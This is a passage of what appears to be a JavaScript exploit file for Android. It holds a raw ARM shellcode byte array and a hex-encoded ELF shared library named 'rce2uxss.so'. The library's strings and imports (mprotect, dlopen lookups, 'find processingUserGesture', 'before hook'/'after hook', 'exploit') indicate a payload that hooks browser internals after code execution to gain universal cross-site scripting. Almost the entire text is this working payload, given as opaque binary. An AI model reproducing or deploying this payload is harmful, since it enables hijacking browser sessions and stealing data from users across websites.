00,0xea,0x14,0xe0,0x9b,0xe5,0x01,0x80,0x88,0xe2,0x10,0xa0,0x8a,0xe2,0x2e,0x02,0x58,0xe1,0x0b,0x00,0x00,0x2a,0x08,0xc2,0x94,0xe7,0x06,0x10,0xa0,0xe1,0x0c,0x00,0x87,0xe0,0x39,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0xf4,0xff,0xff,0x1a,0x04,0x70,0x9a,0xe5,0x08,0x40,0x9d,0xe5,0x07,0x90,0x85,0xe0,0x04,0x00,0x00,0xea,0x10,0x30,0x90,0xe5,0xf0,0x00,0xf0,0xe7,0x08,0x40,0x9d,0xe5,0xcc,0x9c,0x0c,0xe3,0x19,0x98,0xdf,0xe7,0x00,0x50,0x8d,0xe5,0x30,0x10,0x9d,0xe5,0x04,0x30,0xa0,0xe1,0x2c,0x20,0x9d,0xe5,0x02,0x00,0xa0,0xe3,0x28,0x50,0x9d,0xe5,0x35,0xff,0x2f,0xe1,0x1c,0x00,0x9d,0xe5,0x39,0xff,0x2f,0xe1,0x47,0xdf,0x8d,0xe2,0xd0,0x40,0xcd,0xe1,0xd8,0x60,0xcd,0xe1,0xd0,0x81,0xcd,0xe1,0xd8,0xa1,0xcd,0xe1,0x20,0xd0,0x8d,0xe2,0x04,0xf0,0x9d,0xe4,0x2c,0x40,0x9f,0xe5,0x7f,0x25,0x04,0xe3,0x4c,0x26,0x44,0xe3,0x04,0x40,0x8f,0xe0,0x04,0xa0,0x94,0xe4,0xfa,0x0e,0x5a,0xe3,0xfc,0xff,0xff,0x1a,0x00,0x30,0x94,0xe5,0x02,0x00,0x53,0xe1,0xf9,0xff,0xff,0x1a,0x78,0xfe,0xff,0xea,0x73,0x6f,0x5f,0x6d,0x61,0x69,0x6e,0x00,0x70,0xf7,0xff,0xff,0x00,0xf0,0x20,0xe3,];
var so_str = "7f454c4601010100000000000000000003002800010000000000000034000000f84100000000000534002000090028001c001b000600000034000000340000003400000020010000200100000400000004000000030000005401000054010000540100001300000013000000040000000100000001000000000000000000000000000000482f0000482f00000500000000100000010000000c3e00000c4e00000c4e00000c02000025020000060000000010000002000000583e0000584e0000584e000050010000500100000600000004000000040000006801000068010000680100003800000038000000040000000400000051e5746400000000000000000000000000000000000000000600000000000000010000701c2600001c2600001c2600003001000030010000040000000400000052e574640c3e00000c4e00000c4e0000f4010000f401000006000000040000002f73797374656d2f62696e2f6c696e6b65720000080000000400000001000000416e64726f69640017000000040000001000000003000000474e55001a8ff88134c2293b1f1663d3188afd29000000000000000000000000000000000100000000000000000000001200000029000000000000000000000012000000380000000000000000000000120000004800000000000000000000001200000055000000000000000000000012000000670000000000000000000000120000007b0000000000000000000000120000008200000000000000000000001200000089000000000000000000000012000000a5000000000000000000000012000000ac000000000000000000000012000000cc000000000000000000000012000000db000000000000000000000012000000e4000000000000000000000012000000ea000000000000000000000012000000f2000000000000000000000011000000f900000031500000000000001000f1fffe00000018500000000000001000f1ff0501000018500000000000001000f1ffc4000000fc0900008404000012000d00005f5f736e7072696e74665f63686b004c494243006c6962632e736f0072636532757873732e736f005f5f6378615f66696e616c697a6500646c61646472006c6962646c2e736f005f5f6378615f617465786974005f5f72656769737465725f6174666f726b005f5f616e64726f69645f6c6f675f7072696e74006d616c6c6f63006d656d736574005f5f61656162695f6d656d637079004c4942435f50524956415445006d656d637079005f5f676e755f556e77696e645f46696e645f657869647800736f5f6d61696e005f5f61656162695f6d656d736574006d70726f746563740061626f727400667072696e746600737464657272005f656e64005f6564617461005f5f6273735f7374617274006c6962632b2b2e736f006c69626d2e736f006c69626d656469616e646b2e736f006c69627574696c732e736f006c696262696e6465722e736f006c69626d656469612e736f006c696273746167656672696768742e736f006c696273746167656672696768745f666f756e646174696f6e2e736f006c6962637574696c732e736f006c6962696e7075742e736f006c6962616e64726f69645f72756e74696d652e736f0000000003000000110000000100000005000000086c0029110000001300000014000000bae3927c4345d5ecd971581cab0d0aa2000002000200040002000200000002000200030002000300030002000200020002000100010001000100000001000100010001000fdd820c14000000000000001d0000000000000001000200150000001000000030000000630d0500000002001000000010000000c5cf6300000003009800000000000000010001003f0000001000000000000000630d0500000004001000000000000000144e000017000000184e0000170000001c4e000017000000204e000017000000244e000017000000284e0000170000002c4e000017000000304e000017000000344e000017000000384e0000170000003c4e000017000000404e000017000000444e000017000000484e0000170000004c4e000017000000504e000017000000544e000017000000ac4f000017000000b04f000017000000b44f0000170000000050000017000000a84f000015100000c44f000016020000c84f000016040000cc4f000016050000d04f000016060000d44f000016070000d84f000016080000dc4f0000160a0000e04f0000160d0000e44f0000160e0000e84f0000160f0000ec4f000016090000f04f0000160c0000f44f000016030000f84f000016010000fc4f0000160b000004e02de504e09fe50ee08fe008f0bee51049000000c68fe204ca8ce210f9bce500c68fe204ca8ce208f9bce500c68fe204ca8ce200f9bce500c68fe204ca8ce2f8f8bce500c68fe204ca8ce2f0f8bce500c68fe204ca8ce2e8f8bce500c68fe204ca8ce2e0f8bce500c68fe204ca8ce2d8f8bce500c68fe204ca8ce2d0f8bce500c68fe204ca8ce2c8f8bce500c68fe204ca8ce2c0f8bce500c68fe204ca8ce2b8f8bce500c68fe204ca8ce2b0f8bce500c68fe204ca8ce2a8f8bce500c68fe204ca8ce2a0f8bce500482de904b08de20c309fe503308fe00300a0e1ccffffeb0088bde88c48000000482de904b08de208d04de208000be508301be5000053e30100000a08301be533ff2fe104d04be20088bde800482de904b08de208d04de208000be52c309fe503308fe00300a0e108101be520309fe503308fe00320a0e1b6ffffeb0030a0e10000a0e10300a0e104d04be20088bde8b8ffffff2848000000482de904b08de210d04de208000be50c100be510200be508001be50c101be510201be518309fe503308fe0a6ffffeb0030a0e10000a0e10300a0e104d04be20088bde8d8470000f4426de18c319fe50140a0e1f860cde10070a0e180019fe580c19fe5f081cde10260a0e1f8a1cde103508fe020e08de51cd04de200908fe0001095e5d020c9e10ca08fe00080dae5002081e5043081e5082099e5000058e3082081e53f00001a3cb19fe501e0a0e350008de834319fe50600a0e300e0cae52c519fe50b908fe003208fe00910a0e10730a0e105a08fe07effffeb00b094e50910a0e10a20a0e10600a0e314a08de504509be50cc08be200c08de50cc08de50530a0e173ffffebe8109fe508508de501208fe0003092e503a085e010308de50a00a0e16effffeb0810a0e10a20a0e10050a0e16dffffeb00009be50c8085e204109be5b0c09fe5f000c5e110009de508e09be50c108fe0001091e50020a0e10800a0e108e085e563ffffeb10b09de50c109de50c208be2020085e008209de55dffffeb0910a0e114909de500808de50a30a0e10600a0e304a085e50920a0e14cffffeb005084e550309fe50700a0e10410a0e10620a0e103a08fe000c09ae51cd08de2d040cde1d860cde1d081cde1d8a1cde120e09de524d08de21cff2fe1ac4700008c470000a0470000881e00008c1e00008c1e00001c470000c44600006c46000014c49fe5f4426de1f860cde1f081cde1f8a1cde10c408fe020e08de524d04de20060d4e5000056e30600000a24d08de2d040cde1d860cde1d081cde1d8a1cde120d08de204f09de4d0739fe50110a0e30050a0e1c8239fe50530a0e10600a0e30010c4e507908fe0b8739fe50910a0e102208fe016ffffeb004095e50910a0e10600a0e3a0339fe503208fe00430a0e10fffffeb94e39fe50910a0e107208fe08cc39fe50600a0e31ca095e5188095e50eb08fe00c508fe00a30a0e100808de504808de500808be500a085e500ffffeb60039fe50620a0e100308fe074030ce30810d3e5c90140e307b0d3e509c0d3e500e0d3e50150d3e510108de50260d3e50cb08de50a10d3e514c08de50370d3e50480d3e50590d3e506a0d3e518108de50b30d3e51c308de502b0d4e7013082e20e005be19a00001a03c0d4e705005ce19700001a02c084e00210dce5060051e19300001a03b0dce507005be19000001a0410dce5080051e18d00001a05b0dce509005be18a00001a0610dce50a0051e18700001a0710dce50cb09de50b0051e18300001a0810dce510b09de50b0051e17f00001a0910dce514b09de50b0051e17b00001a0a10dce518b09de50b0051e17700001a0b10dce51cb09de50b0051e17300001a60e29fe50da08ce20c30a0e158629fe50600a0e3df780fe350229fe500704fe34c129fe50e508fe048b29fe506908fe002808fe000a085e501208fe00910a0e100c088e5adfeffeb010aa0e3aefeffeb0060a0e10910a0e10630a0e10b208fe014b29fe50600a0e3a4feffebff0ec6e3021aa0e30720a0e30f00c0e3abfeffeb003098e5021aa0e30720a0e3ffaec3e30f00cae3a5feffebe0219fe50c7086e50910a0e1d8c19fe50600a0e302508fe00b208fe008e095e50c308fe0d0a0c5e1103086e508e086e5f0a0c6e1016086e28afeffeb008098e50910a0e10600a0e3a0919fe5007088e57b730ce309208fe0046088e5c97140e380feffeb0430a0e10010a0e3072084e00100d3e401c081e2080050e33100001a00b0d3e5b5005be32e00001a01a0d3e507005ae32b00001a02e0d3e5f4005ee32800001a0350d3e5b50055e32500001a0480d3e5f30058e32200001a0190a0e12c319fe504a089e00600a0e324119fe503b08fe00a30a0e101208fe00b10a0e160feffebff2ecae3021aa0e30f00c2e30720a0e367feffebfc009fe501c002e30b10a0e1f7c644e30c30a0e104c089e700208fe00600a0e324d08de2d040cde1d860cde1d081cde1d8a1cde120e09de524d08de24bfeffea000052e10c00000a0320a0e15cffffea020053e10c10a0e1c6ffff1aa4609fe50600a0e30090e0e39c709fe506108fe007208fe03dfeffebd2ffffea8c309fe5015044e20c4084e284109fe50600a0e380209fe580609fe503b08fe00530a0e101c08fe000508be502108fe000408ce506208fe0d9ffffea08460000e41c0000fc1c0000041d0000001d000064450000744500002c45000028440000481b000014440000f41b0000ec1b0000a81b000084430000b0fbffff781b00000c1a0000701a00005c1a000078190000701a00001c4200001c4200003c190000ec1900002de9f04f85b01d4617468a460446af4280f039814ff0000b1ae088f003001af80000002800f03b811028c0f0258136e120460d2102aa00f021fc02980d2100eb860000f501722046029200f02ffc14e187f0030007f101081af8009019f0800f0dd120460d2104aa00f008fc4fea890019f0400f23d104990844021d26e009f0f00109209f2923dc802936d1a84580f0068188f003004fea09361af80000b1b241ea0012002a00f0fa8020460021002300f09af906f400404bead03bdce0049900f0fc006ff00302101a4218049223e0bf2927dca0293cd109f00701102201314ff4804002fa01f100eac9201039002341ea0002204600214ae0902940f0d08009f00f0141f002000f2800f0c880204603aa00f0b3fb039a20460d2100f0c6fb4746aae0c02924d1a9f1c000092800f2b680dfe800f00606060606068e0549496be709f007000321013040f4202220461de0b02940f0a480a9f1b00107291bd909f0070001210130012340f4002220460ee0d02940f0948019f0080f40f08f8009f007000121013040f400222046052300f02af9474670e00920dfe801f071042c4981818181a84580f0798088f003001af800200920002a72d012f0f0016fd120460021002355e088f0030010221af80010b9f1c80f4fea111008bf42ea111001f00f0142181f2a59dc013141ea0042204601213de0a84551d2023700260021781e80f003001af8000000f07f0210f0800f02fa01f246ea02063ff409af7a1caf4201f107014ff009001746e8d337e088f0030001231af800004fea003100f00f003ffa81f1013040ea01022046012110e088f003001af8000000f00f0101eb10120f2a1bdc0009013141ea004220460321052300f0b8f80237af42fff4e8ae1bf0010f09d101aa20460e2100f0f6fa019a20460f2100f009fb082000e0092005b0bde8f08f000070b51646054604292ad8049cdfe801f0030a280f170002200f2e20d8fbb92846314613e0052b15d11f2e17d825e002201f2e14d8052b12d106f170011fe00220032e0cd85bb906f1c0012846224600f0c1fa18e0012b01d10f2e0bd9022070bd0d4a0b480b497a4410440a4440f26f3100f002fa284600f03bfb06f580712846224600f0e1fa002818bf022070bd00bff8daffff9cd9ffff263e000070b51546044604292dd8049edfe801f0030b2b101a0002200f2d23d813bb32682046294616e0052b17d11f2d19d827e002201f2d16d8052b14d1d6e9002305f1700121e00220032d0cd85bb9326805f1c001204600f088fa19e0012b01d10f2d0bd9022070bd0e4a0b480c497a4410440a4440f23f3100f0b1f9204600f0eafad6e9002305f58071204600f0a7fa002818bf022070bd00bf1ed9ffff9cd9ffff843d00002de9f04788b00d461f4616468046042d00f26c80dfe805f003386a380300002f60d107aa40460d2100f034fa002859d100244ff001090df1180a002709fa07f0304219d007983a460023011d079129460068cdf800a006904046fff77fff002100220d2f08bf0121002d08bf0122002838d102ea010004430137102fded314f0010f3fd000202ee047f00400052829d105aa40460d2100f0fdf918bbb0b2d8b1340c0df1080914fa86f605983b46011d0591014651f8082b05912946406802922246cdf8009003904046fff747ff002808d10134b442e8d3012f11d10598021d059210e0022008b0bde8f0870c4a0a480a497a4410440a4440f2c53100f01cf9059a00e0079a40460d2100f0dbf9002818bf0220e7e700bfb7d9ffff9cd9ffff5a3c00000846114600f000b8d0f84cc0dcf80020c2f30363002b0ad0012b01d0032b13d1c2f30742042303eb8203022201e001220423bcf1000f07d090f8500010f0010f04d15cf8030008b10920704708466146fff750bd08461146fff7d6bf08461146fff7d2bf70b5adf5086d82b06d460446284600f012e900200df58566e0603046294600f04df9304600f0e0f928b30df585650df58066002821db2846314600f0d9f9e0b9ddf80c3493b1ddf8000421462a46a064ddf82004e064ddf8140420650020984709280fd006280fd0082806d1284600f0bbf90028ddd1052000e003200df5086d02b070bd0920f9e768462146002200f001f8f3e72de9f047adf5926d0cad0c4601462846924600f009f901260df12c080df1040900e0013e01271af0010018bf022708d03eb9226928464ff0ff3100f035f94ff0000a284600f086f900283dd037db28466ff00101424600f00ff92846494600f07df960bb049b002bdbd0019821462a46a0640998e0640698206538469847072811d0092822d0082819d10b98216a8842c7d1114a0e480f497a4410440a4440f2822100f03bf80cad6a4628464ff0ff3100f0e2f800982061284600f05ff902200df5926dbde8f0870520f9e7fff7dce82ddaffff7bdaffff983a0000704700002de93048adf5806d6d460446284600f058e8284621460122fff782ff064a044804497a4410440a4440f2e62100f006f8a8d8ffff00d9ffff2e3a000010b582b00a4b844608487b44dff824e0094cc05800688de806000eeb030123446246fff7aae8fff7a2e800bff0ffffff0a3a0000dedaffffd1d8ffff2de900488ab0694600f0fcf80299002818bf002108460ab0bde800882de900488ab0694600f0eef80099002818bf002108460ab0bde8008801468a68002a08bf7047012010470000ff1f80e834d080e538e080e53ce080e50000a0e31eff2fe1200b80ec1eff2fe1200b80ec1eff2fe1200bc0ec1eff2fe10201e0ec0211e0ec0221e0ec0231e0ec0241e0ec0251e0ec0261e0ec0271e0ec0281e0ec0291e0ec02a1e0ec02b1e0ec02c1e0ec02d1e0ec02e1e0ec02f1e0ec1eff2fe10181a0fc0191a0fc01a1a0fc01b1a0fc1eff2fe110b5114a04460f487a44104b104408301a4484e80500002084f84c004022a06404f10800fff728e804f150004ff4e1710022fff728e82046002100f0a3fa002010bd00bf54feffff003900007800000070b50646144630680d46826830469047012807d130682946c268304690472060002070bd4ef27260cff6ff7070bd000070b50446164620680d4682682046904701280ad1206829463246036920469847b5f1ff3f06d000250ae04ef27265cff6ff7505e0206800210025426b20469047284670bd70b50646144630680d46426930469047012808d130682946826930469047c4e90001002070bd4ef27260cff6ff7070bd2de9f0410746154638680e469846426938469047012809d1386831462a464346c4693846a0470020bde8f0814ef27260cff6ff70bde8f0810168096a0847000010b50c4601684a6a2146904761680020002904bf4ef26b60cff6ff7010bd00002de900480168896a88474ef27460cff6ff70bde8008800000168c96b08470000704700007047000021f003000022c0284ff00000a1f1100108bf012011f1130f88bf012240ea0200704700002de930480d460446b5f1ff3f03da15f1020f07d013e00d2d07dcb5f1ff3f0bd00d2d0cd104f13c0021e00e2d02d104f140001ce00f2d02d104f1440017e00c2d03d804eb8500083011e025f00300c02810d194f84c0030b9012084f84c0004f5ec70fff7f4ee04eb8500a0f594700068bde83088084b054805497b44054a18441944134440f2ac5200f0daf9aedbffffe2dbffff0edcffffee36000070b50e4614460546b6f1ff3f03da16f1020f07d010e00d2e06dcb6f1ff3f09d00d2e09d1ec6370bd0e2e01d12c6470bd0f2e01d16c6470bd0c2e03d805eb8600846070bd26f00300c02811d195f84c0030b9012085f84c0005f5ec70fff7a8ee4ff6d86105eb8600cff6ff71445070bd084b054805497b44054a18441944134440f2bf5200f08ef927dcffffe2dbffff0edcffff5636000021f00f00002270284ff0000021f01f0108bf0120b1f5807f08bf012240ea0200704700002de930480c46054624f00f00702811d0b0f5887f1dd195f84a0030b9012085f84a0005f1d800fff740ee05ebc400a0f5f56025e095f84b0030b9012085f84b0005f5ac70fff734ee05ebc400a0f50a7016e0b0f5807f17d195f8490060b9012085f8490005f1500095f8481011b1fff718ee01e0fff710ee05ebc400a0f5f660d0e90001bde83088084b054805497b44054a18441944134440f2896200f024f961dcffffe2dbffff9ddcffff823500002de9f0480e46074626f00f001d461446702816d0b0f5887f27d197f84a0030b9012087f84a0007f1d800fff7e6ed4ff6dc0107ebc600cff6ff7145504ff6d8012fe097f84b0030b9012087f84b0007f5ac70fff7d6ed4ff6dc5107ebc600cff6ff7145504ff6d8511be0b0f5807f1dd197f8490060b9012087f8490007f1500097f8481011b1fff7b4ed01e0fff7aced4ff6540107ebc600cff6ff7145504ff65001cff6ff714450bde8f088084b054805497b44054a18441944134440f2a46200f0baf8b8dcffffe2dbffff9ddcffffae3400002de93048044694f8100240b920680121426b2046904794f81002002802d00020bde83088d4f8f80168b120686ff00101c268056920469047d4f8f8110a1820466ff00101a8470120bde830882de93048d0f8fc21d0f8f831d0f8f041d0f8f451d0f8e8c1d0f8ece14a610b61cd6000f500758c6001f1180481e800502ccdd0f80c02486284e82c00bde8308810b500f10804204600f080f82046bde8104000f019bd000090f81102704700002de9f04886b00e46016815461c46ca684ff0ff319047074602a9fef7a6ed002813d0049888b1019000220b484ff0ff33084978440844294600903046fef79aed0598381a2060012000e0002006b0bde8f08800bffadcffffae33000070b584b004460e4620684ff0ff31c26820469047002120f001050391002e18bf013d03a92846fef77eed039900280190029106d029b101aa2046294600f050f810b9012084f8100204b070bd083000f033b90000012180f84810704710b582b08c460949864607487944084c4058214400688de80c0072466346fef736edfef72eed00bff0ffffff1c330000dedaffff10b5044694f8410048b194f8401004f1480011b100f05eec01e000f058ec94f8420018b104f1d00000f058ec94f8430018b104f5a87000f056ec94f84400002805d004f5e870bde8104000f07fbc10bd2de9f04b8ab004460891134662685e6809a808a9002500960192029303910021049005a800f0b4f80598002800f07e80b04200f07b800799096801ebc00108460a4650f8045952f8089d002802d00768012f01d1002569e0002f1adb4ff0004c0cea47063e4337583044b7f1ff3f13dd0cea4706d0f804804ff0000c3743002607eb000e4fea186700eb870707f108082de04ff0010c01e04ff0000cdff8cce0c7f30366fe44002e07d0022e0ad1dff8b880012658f80ee00de02a4e56f80ee0002610e0012e35d12a4edff8a4e07e445ef806e0002617f47f0718bf012707ea0c07012f32d04ff20d08c0f6ad384ff00047002e07ea450343ea05034ff00105194407ea490343ea09031a4404f5f673c4f8e821c4f8080283e8024118bf0226bcf1000f18bf0126c4f8fc6128460ab0bde8f08b154b104810497b44124a18441944134440f2f722fff718ff0d4b0a480a497b440a4a18441944134440f2fe22fff70cfff4fffffff8ffffff00320000fcffffffd6310000fddcffff7fdbfffff7ddffff52310000dbddffff6a3100002de9f041099e4ff0004e069dd6f800c06c1a02e0691e0c1b711c254685b1d3f8008001eb550658f836700eea47043c4308ebc60727444fea5504bc45edd3e9e780e80e00bde8f081ff2900f374800231612900f27480dff8fc23dff8f4037a441044dfe811f06200720024012a01300136013c01420148014e0154015a01600166016b0162006f0172006c006c006c006c006c006c006c006c006c006c006c006c006c006c006c006c006c006c006c006c006c006c006c006c006c006c006c006c006c006c006c006c006c006c006c006c006c006c006c006c006c006c006c006c006c006c006c006c00750179017d018101850189018d019101950199019d01a101a501a901ad01b101b501b901bd01c101c501c901cd01d101d501d901dd01e101e501e901ed01f101dff89815dff89005794408e0a1f580701f2806d9dff89415dff88c05794408447047dfe800f010161c22282e343a40464c52585e646a6f73777b7f83878b8f93979b9fa3a7abdff8e013dff8d8037944e5e7dff8cc13dff8c4037944dfe7dff8b813dff8b0037944d9e7dff8a413dff89c037944d3e7dff89013dff888037944cde7dff87c13dff874037944c7e7dff86813dff860037944c1e7dff85413dff84c037944bbe7dff84013dff838037944b5e7dff82c13dff824037944afe7dff81813dff810037944a9e7dff80413dff8fc027944a3e7dff8f012dff8e80279449de7dff8dc12dff8d402794497e7dff8c812dff8c002794491e7dff8b412ab4879448ce7a949a748794488e7a549a348794484e7a1499f48794480e79d499b4879447ce799499748794478e795499348794474e791498f48794470e78d498b4879446ce789498748794468e785498348794464e781497f48794460e77d497b4879445ce779497748794458e775497348794454e771496f48794450e76d496b4879444ce7dff80c14dff80404794446e7dff8f813dff8f003794440e7dff8e413dff8dc0379443ae7dff8d013dff8c803794434e7dff8bc13dff8b40379442ee7dff8a813dff8a003794428e7dff89413dff88c03794422e7dff88013dff8780379441ce7dff86c13dff86403794416e7dff85813dff85003794410e7dff84413dff83c0379440ae7dff83013ca48794405e7c749c648794401e7dff88413dff87c037944fbe6c049bf487944f7e6bc49bb487944f3e6b849b7487944efe6b449b3487944ebe6b049af487944e7e6ac49ab487944e3e6a849a7487944dfe6a449a3487944dbe6a0499f487944d7e69c499b487944d3e6984997487944cfe6944993487944cbe690498f487944c7e68c498b487944c3e6884987487944bfe6844983487944bbe680497f487944b7e67c497b487944b3e6784977487944afe6744973487944abe670496f487944a7e66c496b487944a3e66849674879449fe66449634879449be660495f48794497e65c495b48794493e65849574879448fe65449534879448be650494f48794487e64c494b48794483e64849474879447fe64449434879447be639deffffb630000054dfffff6a2e000050dfffff722e00004cdfffff7a2e000048dfffff822e000044dfffff8a2e000040dfffff922e00003cdfffff9a2e000038dfffffa22e000034dfffffaa2e000030dfffffb22e00002cdfffffba2e000028dfffffc22e000024dfffffca2e000020dfffffd22e00001cdfffffda2e000018dfffffe22e000014dfffffea2e000010dffffff42e00000cdfffff002f000008dfffff0c2f000004dfffff182f000000dfffff242f0000fddeffff302f0000fadeffff3c2f0000f7deffff482f0000f4deffff542f0000f1deffff602f0000eedeffff6c2f0000ebdeffff782f0000e8deffff842f0000e5deffff902f0000e2deffff9c2f0000dedeffffc82c0000dadeffffd02c0000d6deffffd82c0000d2deffffe02c0000cedeffffe82c0000cadefffff02c0000c6defffff82c0000c2deffff002d0000bedeffff082d0000badeffff102d0000b6deffff182d0000b2deffff202d0000aedeffff282d0000aadeffff302d0000a6deffff382d0000a2deffff402d00009edeffff482d00009adeffff502d000096deffff582d000092deffff602d00008edeffff682d00008adeffff702d000087deffff782d000084deffff802d000081deffff882d00007edeffff902d00007bdeffff982d000078deffffa02d000075deffffa82d000072deffffb02d00006fdeffffb82d00006cdeffffc02d000068deffffd42d000064deffffdc2d000060deffffe62d00005ddefffff22d00005adefffffe2d000057deffff0a2e000054deffff162e000051deffff222e00004edeffff2e2e00004bdeffff3a2e000048deffff462e000045deffff522e000042deffff5e2e00003fdeffffe22f00003cdeffffc82d000058dfffffce2f000000e0a0e1ff1f9ee834d09ee53ce09ee51eff2fe1200b90ec1eff2fe1200b90ec1eff2fe1200bd0ec1eff2fe10201f0ec0211f0ec0221f0ec0231f0ec0241f0ec0251f0ec0261f0ec0271f0ec0281f0ec0291f0ec02a1f0ec02b1f0ec02c1f0ec02d1f0ec02e1f0ec02f1f0ec1eff2fe10181b0fc0191b0fc01a1b0fc01b1b0fc1eff2fe17847c04600c09fe50ff08ce06cffffff7847c04600c09fe50ff08ce0ccffffff24e2ff7fb0af0680d8e3ff7fb0af088054e8ff7fb0af0480f4eaff7fb0b0aa802cecff7fb0ae078048edff7fb0b0b080a4edff7fd408000030eeff7fd808000004efff7fb0b0b08000efff7fd408000034efff7fb0a8018068efff7f8084098098efff7fb0b0b0809eefff7f0100000020f0ff7fb0b0a88068f0ff7fb0b0aa8004f1ff7fb0b0ac8034f1ff7fb0b0b08034f1ff7fb0b0a8804cf1ff7fb08084805cf1ff7fb0b0b08088f1ff7fb08384801cf2ff7fb0b0aa80acf2ff7fb0b0b080c8f2ff7fb083848070f3ff7fb08f84803cf4ff7fb0838480c0f4ff7fb0b0a880d0f4ff7fb0b0b080d0f4ff7f8f84058024f5ff7fb0aa038068f5ff7fb0b0b08070f5ff7fb0a801809cf5ff7fb0b0a880e4f5ff7fbf8409806cf7ff7fb0b0ac80acf7ff7fb0b0b08034feff7f010000006578706c6f69740025782c25782c2578000000006c656e2069732025642c25730000000061727261792062756666657220616464726573732061742025780000646c6f70656e206164647265737320617420257800000000737472696e672069732025642c25702c2573000066696e642070726f63657373696e6755736572476573747572652061742025780000000076616c75652061742070726f63657373696e6755736572476573747572652069732025780000000066696e6420636f6d70696c652066756e6374696f6e20617420257800636f6465736e697074206174202570006265666f726520686f6f6b00616674657220686f6f6b000066696e64207573656775657374757265206661696c656400766f6964205f556e77696e645f526573756d65285f556e77696e645f457863657074696f6e202a290065787465726e616c2f6c69626378786162692f7372632f556e77696e642f556e77696e642d45484142492e637070005f556e77696e645f526573756d6528292063616e27742072657475726e005f556e77696e645f5652535f526573756c74205f556e77696e645f5652535f536574285f556e77696e645f436f6e74657874202a2c205f556e77696e645f5652535f526567436c6173732c2075696e7433325f742c205f556e77696e645f5652535f44617461526570726573656e746174696f6e2c20766f6964202a2900756e737570706f7274656420726567697374657220636c617373005f556e77696e645f5652535f526573756c74205f556e77696e645f5652535f506f70285f556e77696e645f436f6e74657874202a2c205f556e77696e645f5652535f526567436c6173732c2075696e7433325f742c205f556e77696e645f5652535f44617461526570726573656e746174696f6e29005f556e77696e645f526561736f6e5f436f646520756e77696e645f70686173653228756e775f636f6e746578745f74202a2c205f556e77696e645f457863657074696f6e202a2c20626f6f6c2900647572696e672070686173653120706572736f6e616c6974792066756e6374696f6e207361696420697420776f756c642073746f7020686572652c20627574206e6f7720696e2070686173653220697420646964206e6f742073746f702068657265006c6962756e77696e643a2025732025733a2564202d2025730a005f556e77696e645f5652535f526573756c74205f556e77696e645f5652535f4765745f496e7465726e616c285f556e77696e645f436f6e74657874202a2c205f556e77696e645f5652535f526567436c6173732c2075696e7433325f742c205f556e77696e645f5652535f44617461526570726573656e746174696f6e2c20766f6964202a290065787465726e616c2f6c69626378786162692f7372632f556e77696e642f556e77696e64437572736f722e6870700075696e7433325f74206c6962756e77696e643a3a5265676973746572735f61726d3a3a676574526567697374657228696e74290065787465726e616c2f6c69626378786162692f7372632f556e77696e642f5265676973746572732e68707000756e737570706f727465642061726d20726567697374657200766f6964206c6962756e77696e643a3a5265676973746572735f61726d3a3a736574526567697374657228696e742c2075696e7433325f742900756e775f66707265675f74206c6962756e77696e643a3a5265676973746572735f61726d3a3a676574466c6f6174526567697374657228696e742900556e6b6e6f776e2041524d20666c6f617420726567697374657200766f6964206c6962756e77696e643a3a5265676973746572735f61726d3a3a736574466c6f6174526567697374657228696e742c20756e775f66707265675f742900257300626f6f6c206c6962756e77696e643a3a556e77696e64437572736f723c6c6962756e77696e643a3a4c6f63616c4164647265737353706163652c206c6962756e77696e643a3a5265676973746572735f61726d3e3a3a676574496e666f46726f6d454841424953656374696f6e2870696e745f742c20636f6e7374206c6962756e77696e643a3a556e77696e64496e666f53656374696f6e73202629205b41203d206c6962756e77696e643a3a4c6f63616c4164647265737353706163652c2052203d206c6962756e77696e643a3a5265676973746572735f61726d5d00756e6b6e6f776e20706572736f6e616c69747920726f7574696e6500696e64657820696e6c696e6564207461626c65206465746563746564206275742070722066756e6374696f6e20726571756972657320657874726120776f726473007063006c72007370007230007231007232007233007234007235007236007237007238007239007231300072313100723132007330007331007332007333007334007335007336007337007338007339007331300073313100733132007331330073313400733135007331360073313700733138007331390073323000733231007332320073323300733234007332350073323600733237007332380073323900733330007333310064300064310064320064330064340064350064360064370064380064390064313000643131006431320064313300643134006431350064313600643137006431380064313900643230006432310064323200643233006432340064323500643236006432370064323800643239006433300064333100756e6b6e6f776e20726567697374657200000000a1b20181b0b0aa0300000000a3b20181b0b0ae01000000007fb20181b0b0838400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000